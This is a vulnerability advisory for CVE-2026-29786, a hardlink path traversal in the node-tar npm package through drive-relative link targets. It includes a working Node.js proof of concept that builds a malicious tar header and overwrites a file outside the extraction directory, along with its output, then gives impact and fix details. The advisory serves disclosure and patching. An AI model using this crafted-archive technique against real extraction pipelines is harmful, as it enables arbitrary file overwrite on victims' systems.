CVE-2026-29786: node-tar: Hardlink Path Traversal via Drive-Relative Linkpath
### Summary `tar` (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as `C:../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction. ### Details The extraction logic in `Unpack[STRIPABSOLUTEPATH]` checks for `..` segments *before* stripping absolute roots. What happens with `linkpath: "C:../target.txt"`: 1. Split on `/` gives `['C:..', 'target.txt']`, so `parts.includes('..')` is false. 2. `stripAbsolutePath()` removes `C:` and rewrites the value to `../target.txt`. 3. Hardlink creation resolves this against extraction `cwd` and escapes one directory up. 4. Writing through the extracted hardlink overwrites the outside file. This is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives. ### PoC Tested on Arch Linux with `tar@7.5.9`. PoC script (`poc.cjs`): ```js const fs = require('fs') const path = require('path') const { Header, x } = require('tar') const cwd = process.cwd() const target = path.resolve(cwd, '..', 'target.txt') const tarFile = path.join(process.cwd(), 'poc.tar') fs.writeFileSync(target, 'ORIGINAL\n') const b = Buffer.alloc(1536) new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0) fs.writeFileSync(tarFile, b) x({ cwd, file: tarFile }).then(() => { fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n') process.stdout.write(fs.readFileSync(target, 'utf8')) }) ``` Run: ```bash cd test-workspace node poc.cjs && ls -l ../target.txt ``` Observed output: ```text PWNED -rw-r--r-- 2 joshuavr joshuavr 6 Mar 4 19:25 ../target.txt ``` `PWNED` confirms outside file content overwrite. Link count `2` confirms the extracted file and `../target.txt` are hardlinked. ### Impact This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction. Realistic scenarios: - CLI tools unpacking untrusted tarballs into a working directory - build/update pipelines consuming third-party archives - services that import user-supplied tar files
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2026-29786?
CVE-2026-29786 has been classified as a medium severity vulnerability due to its potential for file overwrite.
How do I fix CVE-2026-29786?
To resolve CVE-2026-29786, upgrade the 'tar' package to version 7.5.10 or later.
What software is affected by CVE-2026-29786?
The vulnerability CVE-2026-29786 affects the 'tar' npm package up to version 7.5.9.
What exploit does CVE-2026-29786 allow?
CVE-2026-29786 allows an attacker to create a hardlink that points outside of the extraction directory, potentially leading to file overwrites.
Can CVE-2026-29786 impact my application?
Yes, CVE-2026-29786 can impact your application if it relies on vulnerable versions of the 'tar' package and performs file extractions.